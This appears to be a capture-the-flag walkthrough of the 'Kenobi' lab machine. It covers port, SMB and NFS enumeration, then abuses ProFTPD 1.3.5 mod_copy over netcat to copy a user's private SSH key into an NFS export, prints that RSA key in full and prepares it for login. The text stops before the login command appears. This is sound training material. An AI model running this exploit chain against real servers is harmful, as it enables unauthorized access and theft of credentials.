KENOBI

 KENOBI (ACTIVE DIRECTORY)

First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command:

  • sudo nmap -n -Pn -sV -sC --min-rate 50000 10.10.81.7 -vvv -sS

This revealed several open TCP ports with associated services, including:

  • FTP (21)
  • HTTP (80)
  • SSH (22)
  • RPC (135)
  • NetBIOS-SSN (139)
  • SMB (445)
  • NFS (2049)
┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -Pn -sV -sC --min-rate 50000 10.10.81.7 -vvv -sS
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 15:39 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
Initiating SYN Stealth Scan at 15:39
Scanning 10.10.81.7 [1000 ports]
Discovered open port 21/tcp on 10.10.81.7
Discovered open port 445/tcp on 10.10.81.7
Discovered open port 139/tcp on 10.10.81.7
Discovered open port 22/tcp on 10.10.81.7
Discovered open port 111/tcp on 10.10.81.7
Discovered open port 80/tcp on 10.10.81.7
Discovered open port 2049/tcp on 10.10.81.7
Increasing send delay for 10.10.81.7 from 0 to 5 due to 250 out of 833 dropped probes since last increase.
Completed SYN Stealth Scan at 15:39, 0.72s elapsed (1000 total ports)
Initiating Service scan at 15:39
Scanning 7 services on 10.10.81.7
Completed Service scan at 15:39, 11.99s elapsed (7 services on 1 host)
NSE: Script scanning 10.10.81.7.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 10.77s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 2.27s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
Nmap scan report for 10.10.81.7
Host is up, received user-set (0.34s latency).
Scanned at 2025-04-10 15:39:17 CEST for 26s
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 ProFTPD 1.3.5
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8syn-ack ttl 61 2-4 (RPC #100000)d:3b:0f:05:7b:e2:c0:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
| 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100021 1,3,4 39169/tcp6 nlockmgr
|_ 100021 1,3,4 51159/udp6 nlockmgr
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs syn-ack ttl 61 2-4 (RPC #100003)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
| date: 2025-04-10T13:39:36
|_ start_date: N/A
|_clock-skew: mean: 1h40m05s, deviation: 2h53m12s, median: 4s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30118/tcp): CLEAN (Couldn't connect)
| Check 2 (port 45344/tcp): CLEAN (Couldn't connect)
| Check 3 (port 46941/udp): CLEAN (Failed to receive data)
| Check 4 (port 32126/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KENOBI<00> Flags: <unique><active>
| KENOBI<03> Flags: <unique><active>
| KENOBI<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2025-04-10T08:39:36-05:00

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.36 seconds
Raw packets sent: 1417 (62.348KB) | Rcvd: 1000 (40.028KB)
sudo nmap -n -p 445,139 -vvv -Pn -sC -sV 10.10.81.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 15:42 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Initiating SYN Stealth Scan at 15:42
Scanning 10.10.81.7 [2 ports]
Discovered open port 139/tcp on 10.10.81.7
Discovered open port 445/tcp on 10.10.81.7
Completed SYN Stealth Scan at 15:42, 0.33s elapsed (2 total ports)
Initiating Service scan at 15:42
Scanning 2 services on 10.10.81.7
Completed Service scan at 15:42, 11.95s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.81.7.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 10.75s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Nmap scan report for 10.10.81.7
Host is up, received user-set (0.31s latency).
Scanned at 2025-04-10 15:42:25 CEST for 23s

PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: KENOBI

Host script results:
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KENOBI<00> Flags: <unique><active>
| KENOBI<03> Flags: <unique><active>
| KENOBI<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time:
| date: 2025-04-10T13:42:44
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30118/tcp): CLEAN (Couldn't connect)
| Check 2 (port 45344/tcp): CLEAN (Couldn't connect)
| Check 3 (port 46941/udp): CLEAN (Failed to receive data)
| Check 4 (port 32126/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2025-04-10T08:42:44-05:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h40m05s, deviation: 2h53m13s, median: 4s

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.53 seconds
Raw packets sent: 2 (88B) | Rcvd: 2 (88B)

We successfully enumerated SMB shares and found two interesting ones with anonymous read/write access: \\anonymous and \\IPC$. The \\anonymous share with the path C:\home\kenobi\share is particularly interesting.

┌──(kali㉿kali)-[~]
└─$sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.81.7 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 15:46 CEST
NSE: Loaded 2 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
Initiating Ping Scan at 15:46
Scanning 10.10.81.7 [4 ports]
Completed Ping Scan at 15:46, 0.33s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:46
Completed Parallel DNS resolution of 1 host. at 15:46, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:46
Scanning 10.10.81.7 [1 port]
Discovered open port 445/tcp on 10.10.81.7
Completed SYN Stealth Scan at 15:46, 0.33s elapsed (1 total ports)
NSE: Script scanning 10.10.81.7.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:46
NSE Timing: About 50.00% done; ETC: 15:47 (0:00:31 remaining)
Completed NSE at 15:46, 55.10s elapsed
Nmap scan report for 10.10.81.7
Host is up, received echo-reply ttl 61 (0.31s latency).
Scanned at 2025-04-10 15:46:04 CEST for 55s

PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 61

Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.81.7\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.81.7\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.81.7\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 55.99 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (72B)

This confirmed the shares found by Nmap (print$, anonymous, IPC$) and also revealed the server name (KENOBI) and workgroup (WORKGROUP).

┌──(kali㉿kali)-[~]
└─$smbclient -NL //10.10.81.7

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP KENOBI

In addition, this has confirmed that even as the user 'kenobi' with no password, we can list the shares and their permissions. The anonymous share had READ access.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.81.7 -u 'kenobi' -p '' --shares
SMB 10.10.81.7 445 KENOBI [*] Unix - Samba (name:KENOBI) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.81.7 445 KENOBI [+] \kenobi: (Guest)
SMB 10.10.81.7 445 KENOBI [*] Enumerated shares
SMB 10.10.81.7 445 KENOBI Share Permissions Remark
SMB 10.10.81.7 445 KENOBI ----- ----------- ------
SMB 10.10.81.7 445 KENOBI print$ Printer Drivers
SMB 10.10.81.7 445 KENOBI anonymous READ
SMB 10.10.81.7 445 KENOBI IPC$ IPC Service (kenobi server (Samba, Ubuntu))


Now, we're going to see if we can enter  and enumerate anonymous user, for it we have to execute the command which you can see below and we successfully connected to the anonymous share without needing a password, but we've listed and download in our machine with this both commands:
  • ls (to listing files or directories)
  • get log.txt (to download file log.txt)
sudo smbclient //10.10.81.7/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 12:49:09 2019
.. D 0 Wed Sep 4 12:56:07 2019
log.txt N 12237 Wed Sep 4 12:49:09 2019


9204224 blocks of size 1024. 6877104 blocks available
smb: \>
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (8.8 KiloBytes/sec) (average 8.8 KiloBytes/sec)
smb: \>

The log.txt file contained information about SSH key generation for the user 'kenobi'. Most importantly, it revealed the location of the private SSH key: /home/kenobi/.ssh/id_rsa and that no passphrase was used.

cat log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.

This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on

# Port 21 is the standard FTP port.
Port 21

We have found that the /var directory was exported via NFS and was accessible from any host (*). You could also list the contents of /var.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.81.7 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 15:59 CEST
NSE: Loaded 3 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Initiating Ping Scan at 15:59
Scanning 10.10.81.7 [4 ports]
Completed Ping Scan at 15:59, 0.33s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:59
Completed Parallel DNS resolution of 1 host. at 15:59, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:59
Scanning 10.10.81.7 [1 port]
Discovered open port 111/tcp on 10.10.81.7
Completed SYN Stealth Scan at 15:59, 0.34s elapsed (1 total ports)
NSE: Script scanning 10.10.81.7.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 6.49s elapsed
Nmap scan report for 10.10.81.7
Host is up, received reset ttl 61 (0.31s latency).
Scanned at 2025-04-10 15:59:50 CEST for 7s

PORT STATE SERVICE REASON
111/tcp open rpcbind syn-ack ttl 61
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836528.0 6877100.0 22% 16.0T 32000
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwx 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (84B)

Now, we have to confirm that a ProFTPD 1.3.5 server was running on the target and we must execute this command which you can see below.
┌──(kali㉿kali)-[~]
└─$ nc 10.10.81.7 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.81.7]

We have found several potential exploits related to ProFTPD 1.3.5, including those related to the mod_copy module.

┌──(kali㉿kali)-[~]
└─$ searchsploit ProFTPD 1.3.5
-------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Met | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Executi | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Executi | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
-------------------------------------------------- ----------------------------

We successfully used the mod_copy vulnerability in ProFTPD to copy Kenobi's private SSH key from its protected location (/home/kenobi/.ssh/) to a world-writable location (/var/tmp/). This was possible because the FTP service was running as a user with read access to Kenobi's home directory which steps are as you can see below:
  1. nc 10.10.81.7 21 (to connected to ftp server)
  2. SITE CPFR /home/kenobi/.ssh/id_rsa (to copy with the SITE (FROM PATH)
  3. SITE CPTO /var/tmp/id_rsa (to copy with the SITE CPTO (DESTINATION PATH)

nc 10.10.81.7 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.81.7]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

Now we have to create mount to share NFS and we need use this commands as you can see below:
  • sudo mkdir /mnt/kenobiNFS (to create folder to share NFS and then mount  in /mnt/kenobiNFS)
  • mount  10.10.81.7:/var /mnt/kenobiNFS (to mount the share NFS in /var /mnt/kenobiNFS)
  • ls -la /mnt/kenobiNFS (to listing share NFS mounted)
┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/kenobiNFS
[sudo] password for kali:

┌──(kali㉿kali)-[~]
└─$ mount 10.10.81.7:/var /mnt/kenobiNFS
mount.nfs: failed to apply fstab options


┌──(kali㉿kali)-[~]
└─$ sudo mount 10.10.81.7:/var /mnt/kenobiNFS 32 

┌──(kali㉿kali)-[~]
└─$ ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Apr 10 16:25 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Apr 10 16:21 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www

Now, we have to get the id_rsa and we should be able to copy in our path /tmp/id_rsa and we should see the id_rsa content as you can see below.

┌──(kali㉿kali)-[~]
└─$ sudo cp /mnt/kenobiNFS/tmp/id_rsa .
┌──(kali㉿kali)-[~]
└─$ cat /mnt/kenobiNFS/tmp/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4PeD0e0522UEj7xlrLmN68R6iSG3HMK/aTI812CTtzM9gnXs
qpweZL+GJBB59bSG3RTPtirC3M9YNTDsuTvxw9Y/+NuUGJIq5laQZS5e2RaqI1nv
U7fXEQlJrrlWfCy9VDTlgB/KRxKerqc42aU+/BrSyYqImpN6AgoNm/s/753DEPJt
dwsr45KFJOhtaIPA4EoZAq8pKovdSFteeUHikosUQzgqvSCv1RH8ZYBTwslxSorW
y3fXs5GwjitvRnQEVTO/GZomGV8UhjrT3TKbPhiwOy5YA484Lp3ES0uxKJEnKdSt
otHFT4i1hXq6T0CvYoaEpL7zCq7udl7KcZ0zfwIDAQABAoIBAEDl5nc28kviVnCI
ruQnG1P6eEb7HPIFFGbqgTa4u6RL+eCa2E1XgEUcIzxgLG6/R3CbwlgQ+entPssJ
dCDztAkE06uc3JpCAHI2Yq1ttRr3ONm95hbGoBpgDYuEF/j2hx+1qsdNZHMgYfqM
bxAKZaMgsdJGTqYZCUdxUv++eXFMDTTw/h2SCAuPE2Nb1f1537w/UQbB5HwZfVry
tRHknh1hfcjh4ZD5x5Bta/THjjsZo1kb/UuX41TKDFE/6+Eq+G9AvWNC2LJ6My36
YfeRs89A1Pc2XD08LoglPxzR7Hox36VOGD+95STWsBViMlk2lJ5IzU9XVIt3EnCl
bUI7DNECgYEA8ZymxvRV7yvDHHLjw5Vj/puVIQnKtadmE9H9UtfGV8gI/NddE66e
t8uIhiydcxE/u8DZd+mPt1RMU9GeUT5WxZ8MpO0UPVPIRiSBHnyu+0tolZSLqVul
rwT/nMDCJGQNaSOb2kq+Y3DJBHhlOeTsxAi2YEwrK9hPFQ5btlQichMCgYEA7l0c
dd1mwrjZ51lWWXvQzOH0PZH/diqXiTgwD6F1sUYPAc4qZ79blloeIhrVIj+isvtq
mgG2GD0TWueNnddGafwIp3USIxZOcw+e5hHmxy0KHpqstbPZc99IUQ5UBQHZYCvl
SR+ANdNuWpRTD6gWeVqNVni9wXjKhiKM17p3RmUCgYEAp6dwAvZg+wl+5irC6WCs
dmw3WymUQ+DY8D/ybJ3Vv+vKcMhwicvNzvOo1JH433PEqd/0B0VGuIwCOtdl6DI9
u/vVpkvsk3Gjsyh5gFI8iZuWAtWE5Av4OC5bwMXw8ZeLxr0y1JKw8ge9NSDl/Pph
YNY61y+DdXUvywifkzFmhYkCgYB6TeZbh9XBVg3gyhMnaQNzDQFAUlhM7n/Alcb7
TjJQWo06tOlHQIWi+Ox7PV9c6l/2DFDfYr9nYnc67pLYiWwE16AtJEHBJSHtofc7
P7Y1PqPxnhW+SeDqtoepp3tu8kryMLO+OF6Vv73g1jhkUS/u5oqc8ukSi4MHHlU8
H94xjQKBgExhzreYXCjK9FswXhUU9avijJkoAsSbIybRzq1YnX0gSewY/SB2xPjF
S40wzYviRHr/h0TOOzXzX8VMAQx5XnhZ5C/WMhb0cMErK8z+jvDavEpkMUlR+dWf
Py/CLlDCU4e+49XBAPKEmY4DuN+J2Em/tCz7dzfCNS/mpsSEn0jo
-----END RSA PRIVATE KEY-----

 ──(root💀kali)-[/home/kali]
└─# nano id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4PeD0e0522UEj7xlrLmN68R6iSG3HMK/aTI812CTtzM9gnXs
qpweZL+GJBB59bSG3RTPtirC3M9YNTDsuTvxw9Y/+NuUGJIq5laQZS5e2RaqI1nv
U7fXEQlJrrlWfCy9VDTlgB/KRxKerqc42aU+/BrSyYqImpN6AgoNm/s/753DEPJt
dwsr45KFJOhtaIPA4EoZAq8pKovdSFteeUHikosUQzgqvSCv1RH8ZYBTwslxSorW
y3fXs5GwjitvRnQEVTO/GZomGV8UhjrT3TKbPhiwOy5YA484Lp3ES0uxKJEnKdSt
otHFT4i1hXq6T0CvYoaEpL7zCq7udl7KcZ0zfwIDAQABAoIBAEDl5nc28kviVnCI
ruQnG1P6eEb7HPIFFGbqgTa4u6RL+eCa2E1XgEUcIzxgLG6/R3CbwlgQ+entPssJ
dCDztAkE06uc3JpCAHI2Yq1ttRr3ONm95hbGoBpgDYuEF/j2hx+1qsdNZHMgYfqM
bxAKZaMgsdJGTqYZCUdxUv++eXFMDTTw/h2SCAuPE2Nb1f1537w/UQbB5HwZfVry
tRHknh1hfcjh4ZD5x5Bta/THjjsZo1kb/UuX41TKDFE/6+Eq+G9AvWNC2LJ6My36
YfeRs89A1Pc2XD08LoglPxzR7Hox36VOGD+95STWsBViMlk2lJ5IzU9XVIt3EnCl
bUI7DNECgYEA8ZymxvRV7yvDHHLjw5Vj/puVIQnKtadmE9H9UtfGV8gI/NddE66e
t8uIhiydcxE/u8DZd+mPt1RMU9GeUT5WxZ8MpO0UPVPIRiSBHnyu+0tolZSLqVul
rwT/nMDCJGQNaSOb2kq+Y3DJBHhlOeTsxAi2YEwrK9hPFQ5btlQichMCgYEA7l0c
dd1mwrjZ51lWWXvQzOH0PZH/diqXiTgwD6F1sUYPAc4qZ79blloeIhrVIj+isvtq
mgG2GD0TWueNnddGafwIp3USIxZOcw+e5hHmxy0KHpqstbPZc99IUQ5UBQHZYCvl
SR+ANdNuWpRTD6gWeVqNVni9wXjKhiKM17p3RmUCgYEAp6dwAvZg+wl+5irC6WCs
dmw3WymUQ+DY8D/ybJ3Vv+vKcMhwicvNzvOo1JH433PEqd/0B0VGuIwCOtdl6DI9
u/vVpkvsk3Gjsyh5gFI8iZuWAtWE5Av4OC5bwMXw8ZeLxr0y1JKw8ge9NSDl/Pph
YNY61y+DdXUvywifkzFmhYkCgYB6TeZbh9XBVg3gyhMnaQNzDQFAUlhM7n/Alcb7
TjJQWo06tOlHQIWi+Ox7PV9c6l/2DFDfYr9nYnc67pLYiWwE16AtJEHBJSHtofc7
P7Y1PqPxnhW+SeDqtoepp3tu8kryMLO+OF6Vv73g1jhkUS/u5oqc8ukSi4MHHlU8
H94xjQKBgExhzreYXCjK9FswXhUU9avijJkoAsSbIybRzq1YnX0gSewY/SB2xPjF
S40wzYviRHr/h0TOOzXzX8VMAQx5XnhZ5C/WMhb0cMErK8z+jvDavEpkMUlR+dWf
Py/CLlDCU4e+49XBAPKEmY4DuN+J2Em/tCz7dzfCNS/mpsSEn0jo
-----END RSA PRIVATE KEY-----

┌──(root💀kali)-[/home/kali]
└─# ls
1.c diccionario grafana_exploit.py log.txt plugin.php routersploit usuarios
alectodb-passwords.txt Docker headers MKBRUTUS plugins.txt rtl8188eu Videos
alectodb-usernames.txt Documents herramientas morata.txt plugin.zip scripts volatility3
beef Downloads hola.zip Music prueba.txt script.sh WinboxExploit
bypassamsi Empire ibombshell Oralyzer Public sqlmap.txt Windows-Exploit
capturas exploits id_rsa ParamSpider reports Suggester
contras flask kenobi.txt password.txt reverseshell.php Templates
Desktop GOD-KILLER kerbrute Pictures reverse.zip.2 TheFatRat

We set the correct permissions on the private key file with the correct command as you can see below. 
┌──(root💀kali)-[/home/kali]
└─# chmod 600 id_rsa

In addition, we successfully authenticated to the target machine as the user 'kenobi' using the retrieved private SSH key, without needing a password with the command you can see below.

